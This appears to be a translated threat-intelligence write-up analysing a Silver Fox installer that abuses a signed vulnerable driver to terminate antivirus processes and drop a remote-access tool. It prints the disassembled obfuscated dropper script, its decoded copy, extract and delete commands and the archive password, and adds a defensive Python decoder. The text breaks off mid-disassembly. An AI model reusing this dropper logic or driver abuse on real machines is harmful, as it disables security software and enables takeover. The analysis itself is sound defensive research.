
[Share] The ever-evolving Silver Fox: adding yet more vulnerable drivers to kill antivirus software via BYOVD

z3960 


The ever-evolving Silver Fox: adding yet more vulnerable drivers to kill antivirus software via BYOVD

I. Background


During routine sample hunting we found that a captured Silver Fox sample attempted to load a suspicious driver that had not been seen before, STProcessMonitor Driver, and ultimately loaded the WinOs remote-access program to take control of the user's computer.
The driver passed WHQL certification and carries digital signatures issued by "Safetica Technologies s.r.o." and "Microsoft Windows Hardware Compatibility Publisher"; the signing timestamp is 9 May 2025, 11:43:46, which is quite recent.

Analysis shows that STProcessMonitor Driver exposes its process-termination IOCTL to user mode without any validation of the target. This flaw lets an attacker terminate arbitrary processes from kernel mode, i.e. KillAV via BYOVD.

Tracing further back, we found that this group of Silver Fox actors has repeatedly combined several vulnerable drivers to interfere with antivirus software, manipulate user computers at will, and finally load the WinOs remote-access payload, turning the victim's computer into a "zombie" under the attacker's control. This has been discovered and analysed several times before by domestic security vendors; see:
  1. July 2025, Kingsoft Internet Security (金山毒霸) security team / Eagle Eye Threat Intelligence Center team: "New developments in 'Silver Fox': multiple rootkits working together, kernel InfinityHook + penetrating read/write"
  2. November 2025, ThreatBook (微步在线) team: "Four drivers in a row! Silver Fox goes head-to-head with EDR and antivirus | Silver Fox October summary"
However, the STProcessMonitor Driver used this time had not been used before and does not appear in the articles above; it is a vulnerable-driver abuse newly added to the current sample. Because no record of this driver could be found on the Internet, in open-source repositories or in vulnerability databases, and because VirusTotal Relations data indicates the driver is still being distributed (i.e. it is probably still in use and in circulation), we submitted it to the CVE database and it was assigned CVE-2025-70795 (in RESERVED status at the time of writing; once this article is published and a submission has been made to the magicsword-io/LOLDrivers repository, we will apply for publication at a suitable time). This also suggests that this group of Silver Fox actors may be actively searching for and mining brand-new vulnerable drivers in the wild.
The sample's execution flow diagram is as follows:

The mind map for this article is as follows (ordered by increasing complexity):


II. Sample Analysis



A.) Setup


SHA-256: 3ba89047b9fb9ae2281e06a7f10a407698174b201f28fc1cadb930207254e485
This program is an installer packaged with Inno Setup, as shown in the figure below:

Step 1: extract the application files and the embedded files from the installer.
(1) The application files inside the installer are: main.1, main.2, unzip.2, unzip.3. Of these, main.1 has a 7-Zip archive header but is incomplete on its own; unzip.3 has an MZ header and a PE header but is likewise incomplete on its own. Concatenating main.1 + main.2 yields what can be confirmed as an encrypted 7-Zip archive; concatenating unzip.3 + unzip.2 yields 7-Zip Standalone Console (signed by NVIDIA Corporation).

(2) We also observed the embedded file CompiledCode.bin, which is a compiled IFPS script, as shown in the figure below.
Step 2: disassemble the compiled IFPS script, CompiledCode.bin => CompiledCode.txt, as shown in the figure below:


1) The "OBFUSCATEDEXTRACT" function


In this assembly-like pseudocode we observed a suspicious function, "OBFUSCATEDEXTRACT"; its original text is as follows:
.function(export) void OBFUSCATEDEXTRACT()        pushtype S32 ; StackCount = 1        pushtype UnicodeString_2 ; StackCount = 2        pushtype UnicodeString_2 ; StackCount = 3        pushtype UnicodeString_2 ; StackCount = 4        pushtype UnicodeString_2 ; StackCount = 5        pushtype UnicodeString_2 ; StackCount = 6        pushtype UnicodeString_2 ; StackCount = 7        pushtype UnicodeString_2 ; StackCount = 8        pushtype UnicodeString_2 ; StackCount = 9        pushtype UnicodeString_2 ; StackCount = 10        pushtype UnicodeString_2 ; StackCount = 11        pushtype UnicodeString_2 ; StackCount = 12        pushtype UnicodeString_2 ; StackCount = 13        pushtype Type30 ; StackCount = 14        pushtype Type30 ; StackCount = 15        pushtype S32 ; StackCount = 16        assign Var16, S32(7)        pushvar Var15 ; StackCount = 17        call SETARRAYLENGTH        pop ; StackCount = 16        pop ; StackCount = 15        assign Var15[0], S32(99)        assign Var15[1], S32(109)        assign Var15[2], S32(100)        assign Var15[3], S32(46)        assign Var15[4], S32(101)        assign Var15[5], S32(120)        assign Var15[6], S32(101)        assign Var14, Var15        pop ; StackCount = 14        pushvar Var2 ; StackCount = 15        call STRFROMCODE        pop ; StackCount = 14        pop ; StackCount = 13        pushtype Type30 ; StackCount = 14        pushtype Type30 ; StackCount = 15        pushtype S32 ; StackCount = 16        assign Var16, S32(137)        pushvar Var15 ; StackCount = 17        call SETARRAYLENGTH        pop ; StackCount = 16        pop ; StackCount = 15        assign Var15[0], S32(47)        assign Var15[1], S32(99)        assign Var15[2], S32(32)        assign Var15[3], S32(99)        assign Var15[4], S32(111)        assign Var15[5], S32(112)        assign Var15[6], S32(121)        assign Var15[7], S32(32)        assign Var15[8], S32(47)        assign Var15[9], 
S32(98)        assign Var15[10], S32(32)        assign Var15[11], S32(47)        assign Var15[12], S32(121)        assign Var15[13], S32(32)        assign Var15[14], S32(34)        assign Var15[15], S32(67)        assign Var15[16], S32(58)        assign Var15[17], S32(92)        assign Var15[18], S32(85)        assign Var15[19], S32(115)        assign Var15[20], S32(101)        assign Var15[21], S32(114)        assign Var15[22], S32(115)        assign Var15[23], S32(92)        assign Var15[24], S32(80)        assign Var15[25], S32(117)        assign Var15[26], S32(98)        assign Var15[27], S32(108)        assign Var15[28], S32(105)        assign Var15[29], S32(99)        assign Var15[30], S32(92)        assign Var15[31], S32(68)        assign Var15[32], S32(111)        assign Var15[33], S32(99)        assign Var15[34], S32(117)        assign Var15[35], S32(109)        assign Var15[36], S32(101)        assign Var15[37], S32(110)        assign Var15[38], S32(116)        assign Var15[39], S32(115)        assign Var15[40], S32(92)        assign Var15[41], S32(109)        assign Var15[42], S32(97)        assign Var15[43], S32(105)        assign Var15[44], S32(110)        assign Var15[45], S32(46)        assign Var15[46], S32(49)        assign Var15[47], S32(34)        assign Var15[48], S32(32)        assign Var15[49], S32(43)        assign Var15[50], S32(32)        assign Var15[51], S32(34)        assign Var15[52], S32(67)        assign Var15[53], S32(58)        assign Var15[54], S32(92)        assign Var15[55], S32(85)        assign Var15[56], S32(115)        assign Var15[57], S32(101)        assign Var15[58], S32(114)        assign Var15[59], S32(115)        assign Var15[60], S32(92)        assign Var15[61], S32(80)        assign Var15[62], S32(117)        assign Var15[63], S32(98)        assign Var15[64], S32(108)        assign Var15[65], S32(105)        assign Var15[66], S32(99)        assign Var15[67], S32(92)        assign Var15[68], S32(68)        assign 
Var15[69], S32(111)        assign Var15[70], S32(99)        assign Var15[71], S32(117)        assign Var15[72], S32(109)        assign Var15[73], S32(101)        assign Var15[74], S32(110)        assign Var15[75], S32(116)        assign Var15[76], S32(115)        assign Var15[77], S32(92)        assign Var15[78], S32(109)        assign Var15[79], S32(97)        assign Var15[80], S32(105)        assign Var15[81], S32(110)        assign Var15[82], S32(46)        assign Var15[83], S32(50)        assign Var15[84], S32(34)        assign Var15[85], S32(32)        assign Var15[86], S32(34)        assign Var15[87], S32(67)        assign Var15[88], S32(58)        assign Var15[89], S32(92)        assign Var15[90], S32(85)        assign Var15[91], S32(115)        assign Var15[92], S32(101)        assign Var15[93], S32(114)        assign Var15[94], S32(115)        assign Var15[95], S32(92)        assign Var15[96], S32(80)        assign Var15[97], S32(117)        assign Var15[98], S32(98)        assign Var15[99], S32(108)        assign Var15[100], S32(105)        assign Var15[101], S32(99)        assign Var15[102], S32(92)        assign Var15[103], S32(68)        assign Var15[104], S32(111)        assign Var15[105], S32(99)        assign Var15[106], S32(117)        assign Var15[107], S32(109)        assign Var15[108], S32(101)        assign Var15[109], S32(110)        assign Var15[110], S32(116)        assign Var15[111], S32(115)        assign Var15[112], S32(92)        assign Var15[113], S32(109)        assign Var15[114], S32(97)        assign Var15[115], S32(105)        assign Var15[116], S32(110)        assign Var15[117], S32(90)        assign Var15[118], S32(84)        assign Var15[119], S32(116)        assign Var15[120], S32(82)        assign Var15[121], S32(106)        assign Var15[122], S32(84)        assign Var15[123], S32(102)        assign Var15[124], S32(121)        assign Var15[125], S32(104)        assign Var15[126], S32(78)        assign Var15[127], S32(73)        
assign Var15[128], S32(68)        assign Var15[129], S32(67)        assign Var15[130], S32(65)        assign Var15[131], S32(70)        assign Var15[132], S32(46)        assign Var15[133], S32(120)        assign Var15[134], S32(109)        assign Var15[135], S32(108)        assign Var15[136], S32(34)        assign Var14, Var15        pop ; StackCount = 14        pushvar Var3 ; StackCount = 15        call STRFROMCODE        pop ; StackCount = 14        pop ; StackCount = 13        pushtype BOOLEAN ; StackCount = 14        pushtype Pointer ; StackCount = 15        setptr Var15, Var1        pushtype U8_4 ; StackCount = 16        assign Var16, U8_4(1)        pushtype S32 ; StackCount = 17        assign Var17, S32(0)        pushtype UnicodeString_2 ; StackCount = 18        assign Var18, String_3("")        pushtype UnicodeString_2 ; StackCount = 19        assign Var19, Var3        pushtype UnicodeString_2 ; StackCount = 20        assign Var20, Var2        pushvar Var14 ; StackCount = 21        call EXEC        pop ; StackCount = 20        pop ; StackCount = 19        pop ; StackCount = 18        pop ; StackCount = 17        pop ; StackCount = 16        pop ; StackCount = 15        pop ; StackCount = 14        sfz Var14        pop ; StackCount = 13        jf loc_196d        pushtype Type30 ; StackCount = 14        pushtype Type30 ; StackCount = 15        pushtype S32 ; StackCount = 16        assign Var16, S32(25)        pushvar Var15 ; StackCount = 17        call SETARRAYLENGTH        pop ; StackCount = 16        pop ; StackCount = 15        assign Var15[0], S32(67)        assign Var15[1], S32(58)        assign Var15[2], S32(92)        assign Var15[3], S32(85)        assign Var15[4], S32(115)        assign Var15[5], S32(101)        assign Var15[6], S32(114)        assign Var15[7], S32(115)        assign Var15[8], S32(92)        assign Var15[9], S32(80)        assign Var15[10], S32(117)        assign Var15[11], S32(98)        assign Var15[12], S32(108)        assign 
Var15[13], S32(105)        assign Var15[14], S32(99)        assign Var15[15], S32(92)        assign Var15[16], S32(68)        assign Var15[17], S32(111)        assign Var15[18], S32(99)        assign Var15[19], S32(117)        assign Var15[20], S32(109)        assign Var15[21], S32(101)        assign Var15[22], S32(110)        assign Var15[23], S32(116)        assign Var15[24], S32(115)        assign Var14, Var15        pop ; StackCount = 14        pushvar Var4 ; StackCount = 15        call STRFROMCODE        pop ; StackCount = 14        pop ; StackCount = 13        pushtype Type30 ; StackCount = 14        pushtype Type30 ; StackCount = 15        pushtype S32 ; StackCount = 16        assign Var16, S32(7)        pushvar Var15 ; StackCount = 17        call SETARRAYLENGTH        pop ; StackCount = 16        pop ; StackCount = 15        assign Var15[0], S32(92)        assign Var15[1], S32(109)        assign Var15[2], S32(97)        assign Var15[3], S32(105)        assign Var15[4], S32(110)        assign Var15[5], S32(46)        assign Var15[6], S32(49)        assign Var14, Var15        pop ; StackCount = 14        pushvar Var7 ; StackCount = 15        call STRFROMCODE        pop ; StackCount = 14        pop ; StackCount = 13        pushtype Type30 ; StackCount = 14        pushtype Type30 ; StackCount = 15        pushtype S32 ; StackCount = 16        assign Var16, S32(7)        pushvar Var15 ; StackCount = 17        call SETARRAYLENGTH        pop ; StackCount = 16        pop ; StackCount = 15        assign Var15[0], S32(92)        assign Var15[1], S32(109)        assign Var15[2], S32(97)        assign Var15[3], S32(105)        assign Var15[4], S32(110)        assign Var15[5], S32(46)        assign Var15[6], S32(50)        assign Var14, Var15        pop ; StackCount = 14        pushvar Var8 ; StackCount = 15        call STRFROMCODE        pop ; StackCount = 14        pop ; StackCount = 13        pushtype BOOLEAN ; StackCount = 14        pushtype UnicodeString_2 ; 
StackCount = 15        pushtype WideString ; StackCount = 16        assign Var16, Var4        add Var16, Var7        assign Var15, Var16        pop ; StackCount = 15        pushvar Var14 ; StackCount = 16        call DELETEFILE        pop ; StackCount = 15        pop ; StackCount = 14        pop ; StackCount = 13        pushtype BOOLEAN ; StackCount = 14        pushtype UnicodeString_2 ; StackCount = 15        pushtype WideString ; StackCount = 16        assign Var16, Var4        add Var16, Var8        assign Var15, Var16        pop ; StackCount = 15        pushvar Var14 ; StackCount = 16        call DELETEFILE        pop ; StackCount = 15        pop ; StackCount = 14        pop ; StackCount = 13        pushtype Type30 ; StackCount = 14        pushtype Type30 ; StackCount = 15        pushtype S32 ; StackCount = 16        assign Var16, S32(11)        pushvar Var15 ; StackCount = 17        call SETARRAYLENGTH        pop ; StackCount = 16        pop ; StackCount = 15        assign Var15[0], S32(92)        assign Var15[1], S32(102)        assign Var15[2], S32(117)        assign Var15[3], S32(110)        assign Var15[4], S32(122)        assign Var15[5], S32(105)        assign Var15[6], S32(112)        assign Var15[7], S32(46)        assign Var15[8], S32(101)        assign Var15[9], S32(120)        assign Var15[10], S32(101)        assign Var14, Var15        pop ; StackCount = 14        pushvar Var5 ; StackCount = 15        call STRFROMCODE        pop ; StackCount = 14        pop ; StackCount = 13        pushtype Type30 ; StackCount = 14        pushtype Type30 ; StackCount = 15        pushtype S32 ; StackCount = 16        assign Var16, S32(24)        pushvar Var15 ; StackCount = 17        call SETARRAYLENGTH        pop ; StackCount = 16        pop ; StackCount = 15        assign Var15[0], S32(92)        assign Var15[1], S32(109)        assign Var15[2], S32(97)        assign Var15[3], S32(105)        assign Var15[4], S32(110)        assign Var15[5], S32(90)        assign 
Var15[6], S32(84)        assign Var15[7], S32(116)        assign Var15[8], S32(82)        assign Var15[9], S32(106)        assign Var15[10], S32(84)        assign Var15[11], S32(102)        assign Var15[12], S32(121)        assign Var15[13], S32(104)        assign Var15[14], S32(78)        assign Var15[15], S32(73)        assign Var15[16], S32(68)        assign Var15[17], S32(67)        assign Var15[18], S32(65)        assign Var15[19], S32(70)        assign Var15[20], S32(46)        assign Var15[21], S32(120)        assign Var15[22], S32(109)        assign Var15[23], S32(108)        assign Var14, Var15        pop ; StackCount = 14        pushvar Var6 ; StackCount = 15        call STRFROMCODE        pop ; StackCount = 14        pop ; StackCount = 13        pushtype WideString ; StackCount = 14        assign Var14, Var4        add Var14, Var5        assign Var11, Var14        pop ; StackCount = 13        pushtype WideString ; StackCount = 14        assign Var14, Var4        add Var14, Var6        assign Var12, Var14        pop ; StackCount = 13        pushtype Type30 ; StackCount = 14        pushtype Type30 ; StackCount = 15        pushtype S32 ; StackCount = 16        assign Var16, S32(10)        pushvar Var15 ; StackCount = 17        call SETARRAYLENGTH        pop ; StackCount = 16        pop ; StackCount = 15        assign Var15[0], S32(104)        assign Var15[1], S32(116)        assign Var15[2], S32(76)        assign Var15[3], S32(99)        assign Var15[4], S32(69)        assign Var15[5], S32(78)        assign Var15[6], S32(121)        assign Var15[7], S32(82)        assign Var15[8], S32(70)        assign Var15[9], S32(89)        assign Var14, Var15        pop ; StackCount = 14        pushvar Var9 ; StackCount = 15        call STRFROMCODE        pop ; StackCount = 14        pop ; StackCount = 13        pushtype Type30 ; StackCount = 14        pushtype Type30 ; StackCount = 15        pushtype S32 ; StackCount = 16        assign Var16, S32(10)        pushvar 
Var15 ; StackCount = 17        call SETARRAYLENGTH        pop ; StackCount = 16        pop ; StackCount = 15        assign Var15[0], S32(119)        assign Var15[1], S32(88)        assign Var15[2], S32(115)        assign Var15[3], S32(72)        assign Var15[4], S32(70)        assign Var15[5], S32(110)        assign Var15[6], S32(85)        assign Var15[7], S32(110)        assign Var15[8], S32(113)        assign Var15[9], S32(75)        assign Var14, Var15        pop ; StackCount = 14        pushvar Var10 ; StackCount = 15        call STRFROMCODE        pop ; StackCount = 14        pop ; StackCount = 13        pushtype WideString ; StackCount = 14        pushtype UnicodeString_2 ; StackCount = 15        pushtype Type30 ; StackCount = 16        pushtype Type30 ; StackCount = 17        pushtype S32 ; StackCount = 18        assign Var18, S32(7)        pushvar Var17 ; StackCount = 19        call SETARRAYLENGTH        pop ; StackCount = 18        pop ; StackCount = 17        assign Var17[0], S32(120)        assign Var17[1], S32(32)        assign Var17[2], S32(45)        assign Var17[3], S32(121)        assign Var17[4], S32(32)        assign Var17[5], S32(45)        assign Var17[6], S32(112)        assign Var16, Var17        pop ; StackCount = 16        pushvar Var15 ; StackCount = 17        call STRFROMCODE        pop ; StackCount = 16        pop ; StackCount = 15        assign Var14, Var15        pop ; StackCount = 14        add Var14, Var9        add Var14, Var10        pushtype UnicodeString_2 ; StackCount = 15        pushtype Type30 ; StackCount = 16        pushtype Type30 ; StackCount = 17        pushtype S32 ; StackCount = 18        assign Var18, S32(4)        pushvar Var17 ; StackCount = 19        call SETARRAYLENGTH        pop ; StackCount = 18        pop ; StackCount = 17        assign Var17[0], S32(32)        assign Var17[1], S32(45)        assign Var17[2], S32(111)        assign Var17[3], S32(34)        assign Var16, Var17        pop ; StackCount = 16        
pushvar Var15 ; StackCount = 17        call STRFROMCODE        pop ; StackCount = 16        pop ; StackCount = 15        add Var14, Var15        pop ; StackCount = 14        add Var14, Var4        pushtype UnicodeString_2 ; StackCount = 15        pushtype Type30 ; StackCount = 16        pushtype Type30 ; StackCount = 17        pushtype S32 ; StackCount = 18        assign Var18, S32(3)        pushvar Var17 ; StackCount = 19        call SETARRAYLENGTH        pop ; StackCount = 18        pop ; StackCount = 17        assign Var17[0], S32(34)        assign Var17[1], S32(32)        assign Var17[2], S32(34)        assign Var16, Var17        pop ; StackCount = 16        pushvar Var15 ; StackCount = 17        call STRFROMCODE        pop ; StackCount = 16        pop ; StackCount = 15        add Var14, Var15        pop ; StackCount = 14        add Var14, Var12        pushtype UnicodeString_2 ; StackCount = 15        pushtype Type30 ; StackCount = 16        pushtype Type30 ; StackCount = 17        pushtype S32 ; StackCount = 18        assign Var18, S32(1)        pushvar Var17 ; StackCount = 19        call SETARRAYLENGTH        pop ; StackCount = 18        pop ; StackCount = 17        assign Var17[0], S32(34)        assign Var16, Var17        pop ; StackCount = 16        pushvar Var15 ; StackCount = 17        call STRFROMCODE        pop ; StackCount = 16        pop ; StackCount = 15        add Var14, Var15        pop ; StackCount = 14        assign Var13, Var14        pop ; StackCount = 13        pushtype BOOLEAN ; StackCount = 14        pushtype UnicodeString_2 ; StackCount = 15        assign Var15, Var11        pushvar Var14 ; StackCount = 16        call FILEEXISTS        pop ; StackCount = 15        pop ; StackCount = 14        jz loc_18bc, Var14        pushtype BOOLEAN ; StackCount = 15        pushtype UnicodeString_2 ; StackCount = 16        assign Var16, Var12        pushvar Var15 ; StackCount = 17        call FILEEXISTS        pop ; StackCount = 16        pop ; 
StackCount = 15        and Var14, Var15        pop ; StackCount = 14loc_18bc:        sfz Var14        pop ; StackCount = 13        jf loc_196d        pushtype BOOLEAN ; StackCount = 14        pushtype Pointer ; StackCount = 15        setptr Var15, Var1        pushtype U8_4 ; StackCount = 16        assign Var16, U8_4(1)        pushtype S32 ; StackCount = 17        assign Var17, S32(0)        pushtype UnicodeString_2 ; StackCount = 18        assign Var18, String_3("")        pushtype UnicodeString_2 ; StackCount = 19        assign Var19, Var13        pushtype UnicodeString_2 ; StackCount = 20        assign Var20, Var11        pushvar Var14 ; StackCount = 21        call EXEC        pop ; StackCount = 20        pop ; StackCount = 19        pop ; StackCount = 18        pop ; StackCount = 17        pop ; StackCount = 16        pop ; StackCount = 15        pop ; StackCount = 14        pop ; StackCount = 13        pushtype BOOLEAN ; StackCount = 14        pushtype UnicodeString_2 ; StackCount = 15        assign Var15, Var12        pushvar Var14 ; StackCount = 16        call DELETEFILE        pop ; StackCount = 15        pop ; StackCount = 14        pop ; StackCount = 13loc_196d:        ret
Here we see a large number of ASCII codes; for example, the [99, 109, 100, 46, 101, 120, 101] at the start corresponds to cmd.exe:
        assign Var15[0], S32(99)  ; 'c'
        assign Var15[1], S32(109)  ; 'm'
        assign Var15[2], S32(100)  ; 'd'
        assign Var15[3], S32(46)  ; '.'
        assign Var15[4], S32(101)  ; 'e'
        assign Var15[5], S32(120)  ; 'x'
        assign Var15[6], S32(101)  ; 'e'
The function contains several ASCII-code arrays that are used to build strings and run commands. Encoding strings as arrays (e.g. [67, 58, 92, ...] are ASCII codes that decode to C:\...) raises the bar for analysis.
The ASCII decoding results for all arrays and their corresponding strings are:

  1. Array 1 (7 bytes) ASCII codes: 99, 109, 100, 46, 101, 120, 101. String: "cmd.exe"

  2. Array 2 (137 bytes) ASCII codes: 47, 99, 32, 99, 111, 112, 121, 32, 47, 98, 32, 47, 121, 32, 34, 67, 58, 92, 85, 115, 101, 114, 115, 92, 80, 117, 98, 108, 105, 99, 92, 68, 111, 99, 117, 109, 101, 110, 116, 115, 92, 109, 97, 105, 110, 46, 49, 34, 32, 43, 32, 34, 67, 58, 92, 85, 115, 101, 114, 115, 92, 80, 117, 98, 108, 105, 99, 92, 68, 111, 99, 117, 109, 101, 110, 116, 115, 92, 109, 97, 105, 110, 46, 50, 34, 32, 34, 67, 58, 92, 85, 115, 101, 114, 115, 92, 80, 117, 98, 108, 105, 99, 92, 68, 111, 99, 117, 109, 101, 110, 116, 115, 92, 109, 97, 105, 110, 90, 84, 116, 82, 106, 84, 102, 121, 104, 78, 73, 68, 67, 65, 70, 46, 120, 109, 108, 34. String: "/c copy /b /y "C:\Users\Public\Documents\main.1" + "C:\Users\Public\Documents\main.2" "C:\Users\Public\Documents\mainZTtRjTfyhNIDCAF.xml""

  3. Array 3 (25 bytes) ASCII codes: 67, 58, 92, 85, 115, 101, 114, 115, 92, 80, 117, 98, 108, 105, 99, 92, 68, 111, 99, 117, 109, 101, 110, 116, 115. String: "C:\Users\Public\Documents"

  4. Array 4 (7 bytes) ASCII codes: 92, 109, 97, 105, 110, 46, 49. String: "\main.1"

  5. Array 5 (7 bytes) ASCII codes: 92, 109, 97, 105, 110, 46, 50. String: "\main.2"

  6. Array 6 (11 bytes) ASCII codes: 92, 102, 117, 110, 122, 105, 112, 46, 101, 120, 101. String: "\funzip.exe"

  7. Array 7 (24 bytes) ASCII codes: 92, 109, 97, 105, 110, 90, 84, 116, 82, 106, 84, 102, 121, 104, 78, 73, 68, 67, 65, 70, 46, 120, 109, 108. String: "\mainZTtRjTfyhNIDCAF.xml"

  8. Array 8 (10 bytes) ASCII codes: 104, 116, 76, 99, 69, 78, 121, 82, 70, 89. String: "htLcENyRFY"

  9. Array 9 (10 bytes) ASCII codes: 119, 88, 115, 72, 70, 110, 85, 110, 113, 75. String: "wXsHFnUnqK"

  10. Array 10 (7 bytes) ASCII codes: 120, 32, 45, 121, 32, 45, 112. String: "x -y -p"

  11. Array 11 (4 bytes) ASCII codes: 32, 45, 111, 34. String: " -o""

  12. Array 12 (3 bytes) ASCII codes: 34, 32, 34. String: "" ""

  13. Array 13 (1 byte) ASCII code: 34. String: """
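Decoding these arrays by hand is error-prone, so here is an added helper (not part of the original article or of the sample) that walks an IFPS disassembly in the run-together form shown above, pairs each SETARRAYLENGTH value with the element stores that follow it, rebuilds the string that STRFROMCODE would produce, and checks the element count against the declared length so a truncated dump is noticed. SAMPLE_DISASM is a constructed excerpt; the Var15/Var17 register names and the STRFROMCODE/SETARRAYLENGTH call names are taken from the dump above.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed excerpt in the same run-together shape as the dump above. It holds three
# STRFROMCODE arrays ("cmd.exe", "htLcENyRFY", "x -y -p") and, between the first two,
# an unrelated "assign Var17, S32(0)" (an EXEC argument) to show that a scalar S32 store
# only counts as an array length when SETARRAYLENGTH is the next tracked call.
SAMPLE_DISASM = (
    "assign Var16, S32(7)        pushvar Var15 ; StackCount = 17        call SETARRAYLENGTH"
    "        pop ; StackCount = 16        pop ; StackCount = 15"
    "        assign Var15[0], S32(99)        assign Var15[1], S32(109)        assign Var15[2], S32(100)"
    "        assign Var15[3], S32(46)        assign Var15[4], S32(101)        assign Var15[5], S32(120)"
    "        assign Var15[6], S32(101)        assign Var14, Var15        pop ; StackCount = 14"
    "        pushvar Var2 ; StackCount = 15        call STRFROMCODE        pop ; StackCount = 14"
    "        pushtype S32 ; StackCount = 17        assign Var17, S32(0)        call EXEC"
    "        assign Var16, S32(10)        pushvar Var15 ; StackCount = 17        call SETARRAYLENGTH"
    "        assign Var15[0], S32(104)        assign Var15[1], S32(116)        assign Var15[2], S32(76)"
    "        assign Var15[3], S32(99)        assign Var15[4], S32(69)        assign Var15[5], S32(78)"
    "        assign Var15[6], S32(121)        assign Var15[7], S32(82)        assign Var15[8], S32(70)"
    "        assign Var15[9], S32(89)        assign Var14, Var15        call STRFROMCODE"
    "        assign Var18, S32(7)        pushvar Var17 ; StackCount = 19        call SETARRAYLENGTH"
    "        assign Var17[0], S32(120)        assign Var17[1], S32(32)        assign Var17[2], S32(45)"
    "        assign Var17[3], S32(121)        assign Var17[4], S32(32)        assign Var17[5], S32(45)"
    "        assign Var17[6], S32(112)        assign Var16, Var17        call STRFROMCODE"
)

# One regex with three alternatives, matched in source order, so the decoder sees the
# events in the order the script executes them.
TOKEN_RE = re.compile(
    r"assign Var\d+\[(?P<idx>\d+)\], S32\((?P<code>-?\d+)\)"  # element store Var[i] = code
    r"|assign Var\d+, S32\((?P<len>\d+)\)"                    # scalar S32 (candidate length)
    r"|call (?P<call>SETARRAYLENGTH|STRFROMCODE)"             # the two calls we track
)


@dataclass
class DecodedArray:
    declared_len: Optional[int]  # value handed to SETARRAYLENGTH, None if none was seen
    codes: List[int]             # element values in index order
    text: str                    # the string STRFROMCODE builds from them

    @property
    def consistent(self) -> bool:
        # A mismatch means the dump is truncated or an element store was missed.
        return self.declared_len == len(self.codes)


def decode_strfromcode_arrays(disasm: str) -> List[DecodedArray]:
    """Rebuild every STRFROMCODE string in the order the script produces it."""
    results: List[DecodedArray] = []
    pending_len: Optional[int] = None
    declared_len: Optional[int] = None
    elems: Dict[int, int] = {}
    for m in TOKEN_RE.finditer(disasm):
        if m.group("len") is not None:
            pending_len = int(m.group("len"))       # remembered until the next tracked call
        elif m.group("call") == "SETARRAYLENGTH":
            declared_len, elems = pending_len, {}   # a new array starts here
        elif m.group("idx") is not None:
            elems[int(m.group("idx"))] = int(m.group("code"))
        elif m.group("call") == "STRFROMCODE":
            codes = [elems[i] for i in sorted(elems)]
            text = "".join(chr(c) if 0 <= c < 0x110000 else "\ufffd" for c in codes)
            results.append(DecodedArray(declared_len, codes, text))
            declared_len, elems = None, {}
    return results


# Cheap triage: decoded strings that look like command lines, drive paths or tool switches.
INTEREST_RE = re.compile(r"(?i)(cmd\.exe|/c |[a-z]:\\|\.exe|\s-[a-z])")


def flag_interesting(arrays: List[DecodedArray]) -> List[str]:
    return [a.text for a in arrays if INTEREST_RE.search(a.text)]


if __name__ == "__main__":
    decoded = decode_strfromcode_arrays(SAMPLE_DISASM)
    for n, a in enumerate(decoded, 1):
        mark = "" if a.consistent else "  (length mismatch!)"
        print(f"array {n} ({a.declared_len} bytes): {a.text!r}{mark}")
    print("of interest:", flag_interesting(decoded))
```

Feeding the full CompiledCode.txt text to decode_strfromcode_arrays yields the thirteen strings listed above in the same order.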

The function performs the following steps in sequence:
  1. Runs cmd.exe /c copy /b /y to merge C:\Users\Public\Documents\main.1 and main.2 into mainZTtRjTfyhNIDCAF.xml
  2. Deletes the files main.1 and main.2
  3. Checks whether funzip.exe and mainZTtRjTfyhNIDCAF.xml exist; if both do, runs: funzip.exe x -y -p htLcENyRFYwXsHFnUnqK -o"C:\Users\Public\Documents" "C:\Users\Public\Documents\mainZTtRjTfyhNIDCAF.xml" to extract mainZTtRjTfyhNIDCAF.xml
  4. Deletes mainZTtRjTfyhNIDCAF.xml

So the extraction password for mainZTtRjTfyhNIDCAF.xml is "htLcENyRFYwXsHFnUnqK"; extracting it yields men.exe, man100.dat and Server.log, i.e. it drops men.exe, man100.dat and Server.log. Of these, man100.dat is a Zip archive that extracts to temp_adjust.dat and temp_filler.dat.


2) The "YQMBPLIVKAXLBBKHOYPB" function


In this assembly-like pseudocode we observed another suspicious function, "YQMBPLIVKAXLBBKHOYPB"; its original text is as follows:
.function(export) void YQMBPLIVKAXLBBKHOYPB()    pushtype BOOLEAN ; StackCount = 1    pushtype UnicodeString_2 ; StackCount = 2    pushtype UnicodeString_2 ; StackCount = 3    pushtype UnicodeString_2 ; StackCount = 4    pushtype UnicodeString_2 ; StackCount = 5    pushtype UnicodeString_2 ; StackCount = 6    pushtype S32 ; StackCount = 7    pushtype BOOLEAN ; StackCount = 8    pushvar Var8 ; StackCount = 9    call INITIALIZESETUP    pop ; StackCount = 8    pop ; StackCount = 7    pushvar Var1 ; StackCount = 8    call IS360PROCESSRUNNING    pop ; StackCount = 7    pushtype BOOLEAN ; StackCount = 8    assign Var8, Var1    setz Var8    sfz Var8    pop ; StackCount = 7    jf loc_263f    pushtype BOOLEAN ; StackCount = 8    pushtype Pointer ; StackCount = 9    setptr Var9, Var7    pushtype U8_4 ; StackCount = 10    assign Var10, U8_4(1)    pushtype S32 ; StackCount = 11    assign Var11, S32(0)    pushtype UnicodeString_2 ; StackCount = 12    assign Var12, String_3("")    pushtype UnicodeString_2 ; StackCount = 13    pushtype WideString ; StackCount = 14    pushtype UnicodeString_2 ; StackCount = 15    pushtype Type30 ; StackCount = 16    pushtype Type30 ; StackCount = 17    pushtype S32 ; StackCount = 18    assign Var18, S32(12)    pushvar Var17 ; StackCount = 19    call SETARRAYLENGTH    pop ; StackCount = 18    pop ; StackCount = 17    assign Var17[0], S32(47)    assign Var17[1], S32(99)    assign Var17[2], S32(32)    assign Var17[3], S32(99)    assign Var17[4], S32(111)    assign Var17[5], S32(112)    assign Var17[6], S32(121)    assign Var17[7], S32(32)    assign Var17[8], S32(47)    assign Var17[9], S32(98)    assign Var17[10], S32(32)    assign Var17[11], S32(34)    assign Var16, Var17    pop ; StackCount = 16    pushvar Var15 ; StackCount = 17    call STRFROMCODE    pop ; StackCount = 16    pop ; StackCount = 15    assign Var14, Var15    pop ; StackCount = 14    pushtype UnicodeString_2 ; StackCount = 
